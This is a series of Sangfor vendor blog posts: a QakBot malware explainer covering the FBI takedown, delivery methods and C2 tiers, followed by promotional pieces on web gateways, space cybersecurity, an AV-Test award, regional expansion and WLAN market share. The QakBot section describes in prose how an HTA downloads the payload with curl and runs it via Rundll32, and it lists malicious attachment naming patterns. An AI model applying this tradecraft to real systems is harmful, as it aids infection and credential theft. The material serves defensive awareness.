Sangfor Cyber Command - Platform NDR

Cyber-attacks in the modern age are becoming increasingly complex. As threat actors choose more sophisticated methods, the use of newer malware is growing. Malware is any type of software used to harm a computer or network. By disguising themselves as harmless, malware files will push users to open suspicious files which then infect the network. Malware attacks have been on the rise these last few years. In 2022, Statista reported that global malware attacks reached 5.5 billion. The escalating issue is something to take note of. Lately, the QakBot malware has been making more headlines – however, this time for a good reason. FBI Take Down QakBot The FBI recently dismantled the QakBot malware’s infrastructure and identified more than 700,000 infected computers worldwide - including more than 200,000 in the United States. Many countries, including the US, France, Germany, the Netherlands, the United Kingdom, Romania, and Latvia, worked together to stop the "qbot" malware. This malware caused ransomware attacks and resulted in billions of dollars in damage. The Department assured the public in its release that the QakBot malicious code was being deleted from victim computers - preventing it from doing any more harm. It also announced the seizure of more than US$ 8.6 million in cryptocurrency in illicit profits. The agency redirected QakBot botnet traffic to and through FBI servers which infected the affected computers and prompted them to download a new file. This file would then uninstall the QakBot malware and “untether” the victim’s computer from the QakBot botnet. Martin Estrada, a US Attorney, said that the operation also led to the seizure of almost 9 million dollars in cryptocurrency from the QakBot cybercriminal organization, which would be made available to victims. The operation – named Duck Hunt – is also the largest US-led financial and technical disruption of a botnet infrastructure leveraged by cybercriminals to commit ransomware, financial fraud, and other cyber-enabled criminal activity. What Is QakBot Malware? QakBot – also known as “qbot” or “Pinkslipbot” – was discovered in 2008. As one of the largest and longest-running botnets to date, it has made quite a name for itself. Qbot is a Windows malware that started as a banking trojan. It later evolved into a malware dropper. The malware has been used to target financial institutions, critical infrastructure contractors, and medical device manufacturers on the West Coast. QakBot steals sensitive information to self-propagate to other systems on the network. The malware has been used globally by several ransomware organizations - including Black Basta, Egregor, and Prolock. The Cybersecurity and Infrastructure Security Agency (CISA) named QakBot as one of the top malware strains of 2021. The agency also released a report classifying the malware strain as a banking trojan that steals financial data, browser information or hooks, keystrokes, and credentials. According to another 2020 State of Malware report, QakBot was also named 9th on the list of “Top 10 Threats to Private Companies” and saw a 465% increase from 2019. How Does QakBot Work? QakBot is a second-stage malware, which means it needs to be introduced into the system by a first-stage downloader malware. The initial access can be gained through various techniques – such as malspam, phishing, vulnerability exploitation, or insider attacks. Once inside the system, the qbot malware steals credentials and spreads to other hosts on the network using Microsoft’s PowerShell and the Mimikatz exploit kit. The multiple modules of the QakBot malware also allow qbot to use several methods to steal credentials, including: Keyboard stroke monitoring. Search browser caches for stored passwords. Enumerating system files to find password hashes. The qbot malware allows threat actors to perform manual attacks through remote code execution (RCE). Once infected, qbot can also send additional malware onto the computer, such as ransomware. The malware has been updated and has been adapted many times to help hackers by performing reconnaissance and lateral movement, gathering and exfiltrating data, or delivering other payloads on affected devices. Victim computers then become part of the botnet. A botnet is a network of compromised computers that the hackers control. The users are often unaware of this infection until it's too late. QakBot Malware Infrastructure QakBot uses a command-and-control infrastructure to carry out attacks globally, according to FBI Director, Christopher Wray. In a joint advisory by CISA and the FBI, QakBot’s modular structure was found to be responsible for many malicious features. These have included process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike, Brute Ratel, and other malware. QakBot’s infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. The advisory also revealed that at any given time, thousands of victim computers running Microsoft Windows were infected with QakBot as the botnet was controlled through three tiers of C2 servers. Figure 1: QakBot’s Tiered C2 Servers Infrastructure, Sourced from CISA The advisory further noted that the first tier of C2 servers in the QakBot infrastructure included a subset of thousands of bots selected by the malware’s administrators. These were promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes then communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. CISA stated that as of mid-June 2023, 853 supernodes have been identified in 63 countries - which were all active that same month. The supernodes also frequently change which helps the malware avoid detection by network protection systems. Every bot has been seen communicating with a set of Tier 1 supernodes to relay messages to the Tier 2 C2 servers - serving as proxies to conceal the main C2 server. The 3rd tier server controls all of the bots. Microsoft has also taken a swing at breaking down the infrastructure of the QakBot malware. From its research, the company noted that the qbot might present itself differently on different devices. QakBot was also noted to have three email delivery methods - malicious links, malicious attachments, or embedded images. However, according to Microsoft, the qbot infrastructure seemed to always have the same basic “building blocks” in each campaign that can be rearranged or replaced according to the device shown in Figure 2. These included: The Delivery Blocks – Attachment, Hyperlink, or Embedded Image Macros QakBot Payload Process Injection Credential Theft Scheduled Task Email Exfiltration Lateral Movement Cobalt Strike Ransomware Figure 2. Sample differences among devices affected by a single QakBot campaign. Sourced from Microsoft The QakBot emails sent would all contain hyperlinks with missing the HTTP or HTTPS protocols – which allowed the links to avoid sandboxing but also meant the user had to manually copy and paste the link in the search bar to open the file. Between September and November 2023, Microsoft observed some of the following attachment naming patterns: CMPL-[digits]-[month]-[day].zip Compensation_Reject-[digits]-[mmddyyyy].zip Document_[digits]-[mmddyyyy].zip Document_[digits]-Copy.zip PRMS-[digits].zip Rebate-[digits]-[mmddyyyy].zip REF-[digits]-[month]-[day].zip TXN-[digits].zip Despite varying delivery methods, the QakBot campaigns all use malicious macros in Office documents - specifically Excel 4.0 macros. Once enabled, the macros connect to a predefined set of IP addresses or domains to download the malicious files. The QakBot NoteOne Attacks In January of this year, Microsoft’s OneNote service was used to deliver the QakBot malware. As mentioned before, QakBot campaigns would use Microsoft Office attachments to spread. However, the company began rolling out versions of Office that could block XL4 and VBA macros by default in early 2022. Threat actors then began using HTML attachments. In May 2022, the Follina vulnerability (CVE-2022-30190) in Microsoft’s Support Diagnostic Tool (MSDT) became the ideal opportunity for qbot hackers to deliver the QakBot payload. In December 2022, the Qakbot threat actors turned their attention to OneNote due to its ability to embed executable file types - such as HTA files, CMD files, and BAT files. Since then, OneNote has been used to deliver a variety of malware strains, including Formbook, AsynRAT, and Emotet. The malware campaign – dubbed QakNote – was inspected by cybersecurity specialists who noted two parallel spam campaigns distributing malicious Microsoft OneNote attachments embedded with an HTML application – or HTA file. In one, the hackers would send impersonal malspams with an embedded link to the weaponized “.one file”. On the other, the hackers would use the thread injection method to hijack existing email threads and send a reply-to-all message to its participants with an attached malicious OneNote notebook. However, the subject matter within the messages would be different. Most attachments used in the QakNote campaign would be named either: ApplicationReject_#####(Jan31)[.]one ComplaintCopy_#####(Feb01)[.]one. A fake button then prompts the user to double-click to download the attachment. The hackers can then run the embedded HTA attachment file that further retrieves the QakBot payload. Example of a malicious Microsoft OneNote attachment. Sourced from BleepingComputer   After being launched, those attachments execute commands on the device to download and install QBot. Most of the .hta files contain identical scripting language and instructions for the rest of the attack to follow. The HTA file script uses the legitimate curl.exe application to download a QBot payload to the C:\ProgramData folder and is then executed using Rundll32[.]exe. The QakBot payload then injects itself into the Windows Assistive Technology manager (AtBroker.exe) to conceal its presence and evade detection from AV tools running on the device. About Sangfor Sangfor Technologies is a world-class cybersecurity and cloud computing company that offers intensive and advanced Anti-Ransomware prevention and state-of-the-art IT infrastructure. Protect your data and network from malware using the Sangfor Next-Generation Firewall (NGFW) integrated with Endpoint Security to identify malicious files at both the network level and endpoints and so much more. For more information on Sangfor’s cybersecurity and cloud computing solutions, please visit www.sangfor.com.   Contact Us for Business Inquiry

In today's digital world, a Secure Web Gateway (SWG) remains the primary guardian for protecting Your users and applications' access to the internet. Some SWGs may provide complete control but lack full visibility into how effective those controls really are. This lack of visibility makes it difficult for users to improve operations and fully maximize their ROI. As organizations seek both control and visibility, it becomes imperative to explore alternatives that address this limitation. In this article, we'll discuss why replacing your current SWG with Sangfor IAG (Internet Access Gateway) is a smart choice and highlight its benefits with a real-world case study. Why Replace Your Current SWG? There are several compelling reasons to consider replacing your existing SWG: Lack of Technical Support One of the primary challenges organizations face with SWG vendors is the common decision to exit countries that the vendor does not find profitable, especially after a company merger or acquisition, leaving support to be provided by inadequately trained resellers. When issues arise or you need assistance, a responsive and knowledgeable local support team is critical. SWG customers are often frustrated trying to get immediate support from vendors, especially when active licenses are pending renewal. Resellers are under pressure to get this sorted out, while customers worry about the impact this may have on their business if unnecessary expiration causes downtime. Product End-of-Life/End-of-Support Your current SWG may no longer be supported because the product is reaching its end-of-life or end-of-support. This happens because the vendor is consolidating or reducing product lines, leaving your network vulnerable to emerging threats. Infrequent Updates Staying ahead of cyber threats requires continuous innovation and regular updates. Many SWG solutions are not core products of vendors and, therefore, may have less priority in developing upgrades or signature updates, leaving your organization exposed to new threats. The Sangfor Internet Access Gateway Advantage Sangfor IAG offers several advantages that make it a compelling choice for organizations seeking enhanced security control and visibility: Easy Drop-in SWG Replacement: Sangfor IAG provides a seamless transition, eliminating the need for high overhead costs associated with migration. You can easily replace your existing SWG without disrupting your operations. You start saving long past initial procurement because switching to Sangfor IAG will significantly reduce your 3-year total cost of ownership. Subscription FortiProxy Sangfor IAG Comparison Basic Protection SWG Protection Essential Bundle Save 30% Premium Protection SWG Protection & Content Analysis Premium Bundle Save 35%   Subscription Blue Coat SG Sangfor IAG Comparison Basic Protection Webfilter perpetual/support Reporter Essential Bundle Save 30% Premium Protection Webfilter perpetual/support Reporter Content Analysis System Premium Bundle Save 35%   Migrate Connectivity and Security Policies: Sangfor IAG simplifies the migration process by helping you move over your existing connectivity and security policies. This ensures a smooth transition while maintaining control over your network. With our latest web user interface, the configuration and migration process is more seamless than before. Where some configurations are not 100% replicas of other vendors, our technical support teams are always ready to assist you to transition over properly. Optimized SaaS Application User Experience: In the era of cloud-based applications, ensuring a smooth and secure user experience for SaaS applications is crucial. Sangfor IAG is designed to optimize the performance of these applications, enhancing productivity. Our application database signatures are updated weekly, and the URL database updates twice every week. Sangfor IAG constantly updates newly discovered applications from submissions requested by our customers across the world. Customers benefits include content filtering, application control, and URL filtering, as well as being able to manage and control critical applications without compromising employee's productivity. Each application update includes main functions and sub-functions of application capabilities.   Key Benefits of Sangfor IAG Migrating to Sangfor IAG offers a range of benefits for your organization: Full SWG Capabilities at a Lower Cost: Sangfor IAG provides all the necessary SWG capabilities without the need for costly add-ons or "options." Why pay for features that should be included as standard? Superior Local Sangfor Support and Expertise: With Sangfor, you can count on dedicated local support and expertise. This means faster response times and a deeper understanding of your unique needs. Faster Access to Critical Business Applications: Sangfor IAG ensures faster access to critical business applications while allowing you to restrict recreational traffic. This not only enhances productivity but also strengthens your network security. Finance Case Study Customer Background One of the top 10 largest banks in Southeast Asia faced several challenges: Productivity Loss: Slow and intermittent Internet access was causing significant productivity loss among employees. Complex Policies: Thousands of access control policies made maintaining complex policy sets difficult and cumbersome. Connectivity Issues: Poor connectivity during voice and video conferencing sessions due to misused bandwidth was hampering meetings and essential communications. Sangfor IAG Benefits By implementing Sangfor IAG, this banking institution experienced remarkable improvements: Increased Uptime: Uptime increased by 30%, significantly improving accessibility to critical applications. Simplified Control: The institution consolidated and streamlined its control with fewer policies, reducing the administrative burden. Quality Conferencing: High-quality voice and video conferencing became the norm, enhancing communication and collaboration. Conclusion In conclusion, replacing your existing SWG with Sangfor IAG can lead to enhanced productivity, improved control, and significant cost savings. With a comprehensive feature set, local support, and a commitment to innovation, Sangfor IAG is a compelling choice for organizations looking to stay ahead in today's digital landscape.   Contact Us for Business Inquiry

Mankind has always been reaching for the stars. From the development of the wheel to the first automobile, humans have never faltered in going beyond what was thought possible. Space travel is only one of the latest innovative and rapidly growing sectors of human intelligence and design to lift off the ground. The privatization of the space industry is taking place, so as the opportunities in Space Cybersecurity is also increasing. The global space economy hit record numbers in 2022 by reaching US$ 546 billion and is projected to climb another 41% over the next five years. This drastic rise is due to new technologies, an increase in private and public company space exploration, and investments from governments. A general interest in space ventures and technology has revolutionized to potential of space for the digital age. Unfortunately, space has to endure a lot more than just man-made devices bumbling around in orbit and now has to face the accompanying challenge of space cybersecurity as well. Cybersecurity in Space: Recent Scenario Now, you might think that space is far removed from your daily life but most of the technologies and infrastructure we depend on are circling the planet. From telecommunications satellites and GPS to internet connectivity and weather tracking, technology in space is crucial for global communication and innovation. A cyber-attack on space infrastructure can have devastating effects on everyone on the ground. Cybersecurity for space exploration is also important to maintain secure lines of communication, accurate navigation, and precise control. Space exploration is already a critical venture that requires certainty and stability to ensure the safety of astronauts, technicians, and more. This means that cybersecurity in space should be a priority concern. One of the biggest space cybersecurity threats is hacking into spacecraft and satellites. Cybercriminals can easily take control of vital systems, manipulate controls, and steal confidential data. Jamming and spoofing methods are often used to disrupt or slow down the communication of data from satellites. The war in Ukraine saw the use of jamming and other cyberattacks on the Starlink SpaceX terminal. Military leaders have said that these tactics are common weapons. A research paper from the University of Oxford has also stated that the threat of cyber-attacks has risen due to space systems becoming “increasingly interconnected and computationally complex.” However, most space stations and infrastructure were built before there was a global focus on cybersecurity. This means that these systems are highly complex but also highly vulnerable to cyber-attacks. Two Biggest Telescopes were hacked - a challenge in space cybersecurity On the 1st of August, the National Science Foundation's National Optical-Infrared Astronomy Research Laboratory - or NOIRLab - reported a cybersecurity incident that halted operations at its Gemini North Telescope in Hawaii and Gemini South Telescope in Chile. These attacks came just a few days before the NCSC issued its advisory to American space companies and research organizations about the threat of cyber-attacks and espionage. Smaller telescopes on Cerro Tololo in Chile were also affected and the staff are still unsure about how the attacks took place. According to a statement by NOIRLab, the recovery process of the affected facilities and telescopes is still ongoing. The scientific community suffers every moment that operations are disrupted by cyber-attacks – not only with expenses but also due to the data being lost during downtime. FBI and Air Force Warn of Cyber-Attacks on Space Industry In August, the FBI, the National Counterintelligence and Security Center (NCSC), and the Air Force Office of Special Investigations released a bulletin warning that foreign intelligence agencies could use cyber-attacks, shell companies, or old-fashioned espionage to collect sensitive information about American space capabilities or innovative technologies. The agencies noted that these foreign intelligence entities “recognize the importance of the commercial space industry to the US economy and national security - including the growing dependence of critical infrastructure on space-based assets.” They go on to state that US space-related innovation and assets are seen as potential threats as well as valuable opportunities to acquire vital technologies and expertise. The advisory went on the state that these attacks could also collect sensitive data related to satellite payloads to disrupt and degrade US satellite communications, remote sensing, and imaging capabilities while also targeting American commercial space infrastructure during international conflicts. The advisory also claims that the global space economy will grow to more than US$ 1 trillion within seven years. The agencies warned that space infrastructure is “fundamental to every aspect of our society, including emergency services, energy, financial services, telecommunications, transportation, and food and agriculture.” What are the Challenges in Space Cybersecurity As mentioned before, cybersecurity for space has been a challenge due to the older systems being used. Most governments have yet to implement adequate cybersecurity measures in space projects due to a lack of funding, infrastructure, and skills. The complexity, interconnection, and rapid growth of the space sector also make it a wider target surface for hackers. Limited Resources and Bandwidth Constraints Without the right funding and internet, most countries around the world are battling to stay ahead in the space race. These limited resources can lead to low or non-existent security measures in place. Vulnerabilities in Satellite Systems and Ground Infrastructure Between the complex operations between space, ground, links, and users, there are several potential vulnerabilities to contend with when it comes to space and ground infrastructure. Cyber threats now also have a larger target with the growing interest from private and commercial organizations. A few of the potentially vulnerable areas in existing space cybersecurity include: Software-defined radio compromise. Insider threats. Hacking ground systems to interact with satellites. Using design and hardware development to imbed malicious features. Communications hacking on TT&C systems through command link injections, replay attacks, or electronic attacks such as jamming and spoofing. Software vulnerabilities. Potential Impact of Cyber-Attacks on Space Missions Cyber-attacks on space infrastructure can include malware installation, ransomware attacks, and data or system breaches. All these attacks can disrupt communications, supply chains, national security, internet access, and global economies. Space missions affected by cyber-attacks can also lead to the injury or death of astronauts, the destruction of property, and the halting of progress in space exploration. What are the Opportunities in Space Cybersecurity? As the space race intensifies and nations rush to create new and innovative technologies to keep up, cybersecurity for space is also becoming a lucrative market. Smaller businesses can seize this opportunity to fill the demand for cybersecurity measures for space technology. Forbes has listed a few ways that smaller companies can amplify their brand in this rapidly expanding sector: Innovate and develop space cybersecurity solutions. Stay informed on industry trends and legislation. Establish thought leadership. Collaborate with educational institutions. Participate in industry associations and events. Diversify service offerings. Create strategic alliances. Establish your brand as a pioneer in the field. Cybersecurity Measures for Space Missions Space systems can be vulnerable because of features like hardcoded credentials – which are used by ships, planes, and the military and can be accessed easily by hackers. This is why space missions need enhanced cybersecurity measures that ensure the safe transmission of data. Some of the cybersecurity measures that can be used include: Secure Communication Protocols and Encryption Techniques: Keeping communications between ground and space stations secure is a crucial element of space cybersecurity. The use of encrypting techniques will ensure a protected line of communication that can be vital for the safety of lives, data, and technology. Authentication and Access Control Mechanisms: Maintaining the right access controls will ensure that only authorized personnel have access to critical infrastructure. Using a zero-trust policy will go a long way to keeping the space system secure. Intrusion Detection and Prevention Systems: Cyber threats need to be identified, isolated, and mitigated by the infrastructure in place. Space missions need to employ active intrusion detection and threat intelligence to root out cyber-attacks before they can do any damage to the system. Data Encryption and Protection Strategies: Hackers will try to exfiltrate satellite data or manipulate data to deliver incorrect transmissions. With data encryption, communications are secure, and the data cannot be stolen, manipulated, or damaged. Space technology has enhanced and elevated as the modern age has developed. Satellites are no longer merely amplifying signals but are growing much more complex and playing a much bigger role in communications on Earth. These innovative new designs have opened a whole world of opportunities for developers, engineers, and inventive minds. We just have to tread carefully and ensure that the future we create today can still be secure tomorrow. Sangfor is a leading cybersecurity and cloud provider that believes in reaching beyond the stars to create a secure, innovative, and better future for us all. For more information on Sangfor’s cybersecurity and cloud computing solutions, please visit www.sangfor.com.   Contact Us for Business Inquiry

Sangfor Technologies is pleased to announce that Sangfor Endpoint Secure has been awarded the "TOP PRODUCT" Award by AV-Test, a leading independent organization specializing in IT security product evaluation. In the latest testing of the best Windows antivirus software for business users, AV-Test continuously evaluated 18 endpoint protection products during July and August 2023. Sangfor Endpoint Secure was one of six products to achieve maximum scores across the three tested categories of Protection, Performance, and Usability.  Sangfor Endpoint Secure Test Results Protection In the Protection category, Sangfor Endpoint Secure was put through rigorous testing that mirrored real-world threats. AV-Test used two stages to assess protection capabilities. The first stage focused on protection against 0-day malware attacks from the Internet, including web and e-mail threats. The second stage evaluated the detection of widespread and prevalent malware discovered in the last 4 weeks. Sangfor Endpoint Secure excelled in both stages, scoring 100% in July and 99.4% in August against 0-day malware attacks, compared to an industry average of 99.7%. It also achieved perfect scores in detecting newly discovered widespread and prevalent malware.   These results confirm that Sangfor Endpoint Secure is highly effective against new and unknown threats. The product incorporates advanced behavioral analytics and is integrated with Sangfor Engine Zero AI-enabled malware detection and Sangfor Neural-X threat intelligence. These features enable it to identify new malware without relying solely on known signatures, making it highly adaptive in a landscape where new malware variants are continually emerging. Performance Performance was another category in which Sangfor Endpoint Secure stood out. AV-Test assessed the impact of security products on system speed while conducting everyday operations, such as launching websites and applications, downloading and installing applications, and copying files. Sangfor Endpoint Secure either matched or outperformed the industry average in all tested aspects, proving that robust security does not have to come at the cost of system performance and productivity. Usability In terms of Usability, Sangfor Endpoint Secure was tested on its ability to avoid inaccurate alerting, detection, and blocking of legitimate behaviors. Throughout the two months of testing, the product registered no false alarms, detections, or blockages across all tested behaviors.   This level of accuracy is especially significant as it minimizes interruptions to users and ensures smooth daily operations. These results are largely attributed to Endpoint Secure's advanced detection capability, as previously noted in the Protection category. To read the original test results, please visit: https://www.av-test.org/en/antivirus/business-windows-client/windows-10/august-2023/sangfor-endpoint-secure-protect-3.2-232415/ Discover Sangfor Endpoint Secure Sangfor Endpoint Secure is a comprehensive endpoint security product that combines Endpoint Detection and Response (EDR) with an Endpoint Protection Platform (EPP) in a unified solution. Endpoint Secure delivers end-to-end protection of endpoints before, during, and after attacks. Prevention mechanisms mitigate risks and vulnerabilities pre-attack, active and passive detection mechanisms identify and block threats during attacks, and remediation mechanisms eradicate residual threats and support forensic investigation post-attack. Sangfor Endpoint Secure also features innovative anti-ransomware capabilities, including the world's first and only endpoint ransomware honeypot. This quickly detects and terminates the ransomware encryption process, minimizing system damage. The encryption-controlling application is also identified and located on other infected systems, allowing for a "One-Click Kill" feature that eradicates the detected ransomware throughout the organization with just a single mouse click.   Contact Us for Business Inquiry

Sangfor Technologies, a leading global provider of advanced cybersecurity and cloud solutions, is proud to announce its expansion into Latin America. The company has established dedicated sales and support teams in Mexico, adding to its existing network of more than 60 branch offices in over 12 countries across APAC and EMEA. This strategic move responds to the growing demand for cutting-edge cybersecurity and cloud solutions in the region, driven by rapid digitalization and government initiatives. With this expansion, Sangfor Technologies underscores its commitment to assisting local organizations on their digital transformation journey. The company offers a comprehensive range of cybersecurity and cloud products and solutions, which are now available in Latin America. With Mexico as our first stop in the Latin America region, Sangfor solidifies its commitment to driving global digital transformation. This marks a pivotal step in our growth strategy, acknowledging the value we can bring to this region and beyond. Jackie Huo, General Manager of Sangfor Latin America Sangfor Products and Solutions Sangfor Security products and solutions Sangfor Network Secure: An industry-leading AI-enabled Next-Generation Firewall (NGFW) with integrated WAF and deception technology. Recognized as a Visionary in the Gartner Magic Quadrant for Network Firewalls. Sangfor Endpoint Secure: A comprehensive endpoint security solution that can stop ransomware in under a few seconds, as demonstrated by attaining perfect scores in zero-day and ransomware tests conducted by AV-Test. Sangfor Cyber Command: An advanced Network Detection & Response (NDR) platform with extensive, purpose-built AI models to detect advanced and unknown cyber threats.  Sangfor Internet Access Gateway: A full-featured Secure Web Gateway (SWG) offering internet access control, data loss prevention, and more. Sangfor Anti-Ransomware Solution: This solution mitigates ransomware attacks by "breaking every step in the kill chain," making it the complete, holistic solution against ransomware. Sangfor Simplified Security Operations Solution: Provides organizations with the essential technologies, human expertise, and proven processes to establish and run professional yet simplified security operations (SecOps). Sangfor Cloud products and solutions Sangfor Hyperconverged Infrastructure (HCI): The world’s first 3rd generation HCI platform that integrates compute, storage, networking, and security. It serves a wide range of digital transformation use cases, like software-defined data center, disaster recovery, and private cloud, with high performance, simplicity, stability, and security. Sangfor Virtual Desktop Infrastructure (VDI): A one-stop VDI solution that helps your business evolve effortlessly from traditional PCs to a virtual desktop workspace. Through deeply integrated server, desktop, and application virtualization, it allows for simple management and secure, efficient work from any device, location, and time. Sangfor Unified Hybrid Cloud: Sangfor’s hybrid cloud solution uses the same HCI infrastructure for both private and managed clouds. This setup provides seamless integration, unified management, and consistent operations and security, reducing the learning curve of cloud technologies and enabling a smoother cloud journey. It is ideal for use cases like data center extension to the cloud, hybrid workload placement, and disaster recovery. Welcoming New Partners As part of its expansion plans, Sangfor Technologies welcomes new partners in Latin America to join forces in delivering exceptional services to local customers. By partnering with Sangfor, you will gain access to: The latest cutting-edge technology in security and cloud Partner development programs with certifications Market Development Fund and exclusive sales incentives A global network with collaboration opportunities Project protection Modular solutions for cross-selling and upselling This partnership offers a unique opportunity for companies with experience in cybersecurity or cloud services and a deep understanding of the Latin American market to collaborate with a renowned industry leader with over 100,000 global customers. Sangfor is recognized by independent analyst firms, including Gartner, Forrester, IDC, and Frost & Sullivan, and cooperates with top-tier technology giants such as Intel, Nvidia, AMD, Microsoft, and SAP. Additionally, its products undergo regular testing by leading independent test organizations like AV-Test and CyberRatings. Join us in this exciting journey as we expand our footprint in Latin America and work towards creating a secure and agile digital environment. We invite interested parties to contact us for more information and apply through our partner application form at https://www.sangfor.com/partners/partner-application-form.   APPLY TO BECOME A PARTNER   About Sangfor Technologies Sangfor Technologies is a leading global provider of cybersecurity and cloud solutions dedicated to helping organizations navigate the complexities of the digital world. With a strong focus on innovation and customer satisfaction, Sangfor Technologies offers a comprehensive portfolio of cutting-edge products and services designed to protect and empower businesses in the ever-evolving digital landscape. With the expansion into Latin America, Sangfor Technologies aims to bring its expertise and industry-leading solutions to organizations across the region, enabling them to thrive in the digital era. For media inquiries, please contact: Email: pr@sangfor.com Website: www.sangfor.com

A Global Top 5 Vendor for Enterprise WLAN Controllers Gartner recently released "Market Share: Enterprise Network Equipment by Market Segment, Worldwide, 1Q231." According to the report, Sangfor Technologies (via its subsidiary Sundray Technology), ranked among the top five vendors in the world for Enterprise WLAN Controller by revenue in 2022 and Q1 of 2023. We believe our success is attributed to our superior networking products, which have garnered significant market recognition. Sundray Technology (hereafter referred to as Sundray) is a wholly-owned subsidiary of Sangfor Technologies (hereafter referred to as Sangfor). Founded in 2000, Sangfor has established four core business segments: cyber security, cloud computing, IT infrastructure, and IoT. Under this structure, Sangfor specializes in cyber security and cloud computing, while Sundray concentrates on network infrastructure and IoT. Tackling Modern Network Challenges Through Industry Specialization Digital transformation is driving new challenges in enterprise networks. As cyber threats advance and multiply, concerns about data and network security have intensified. Network maintenance challenges have also become more pronounced, prompting companies to seek more efficient and intelligent solutions. AI technology has emerged as a critical tool for enhancing network performance and resilience, from network monitoring to swift AI-driven interventions. These trends are shaping the future of enterprise networks, fueling continuous innovations and advancements in networking technology. Sundray’s achievements are attributed to its consistent focus on industry specialization, catering to the complex demands of sectors like healthcare, finance, education, manufacturing, commerce, and government. In constantly refining our understanding of customer needs, we've delved deep into unique industry requirements and challenges, making regular product refinements based on market feedback. Our enterprise WLAN controllers excel in terms of flexibility and scalability, meeting the intricate demands of various industries. In the healthcare sector, for example, we offer highly secure and stable wireless network solutions to support modern mobile healthcare and remote medical services. In finance, our high-performance and reliable wireless networks ensure the utmost security and user experience. For education, we provide easily managed, integrated wireless networks for seamless connectivity among students and staff. About Sundray Enterprise WLAN Controllers Sundray’s enterprise-grade WLAN controllers are proprietary high-performance networking devices. They are equipped to manage a broad spectrum of Sundray products, including network access points and switches. The devices integrate a range of functionalities, from Sundray's next-gen network controllers to firewall systems and unified wired and wireless management systems. Supporting multiple authentication methods, detailed user behavior management, flexible QoS control, integrated wired and wireless management, and the ability to detect, locate, and block potential network threats, we offer users a unified, convenient, secure, efficient, and flexible network management platform. Sundray's innovation trajectory in WLAN controller products mirrors Sangfor's relentless pursuit of technical excellence. Embracing a customer-first ethos, we consistently innovate to meet core business needs, aspiring to develop best-in-class, technologically superior wireless enterprise solutions.   Sources 1. Gartner, Inc., Market Share: Enterprise Network Equipment by Market Segment, Worldwide, 1Q23, By Christian Canales et al., Published July 7, 2023 Disclaimer GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission.  Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.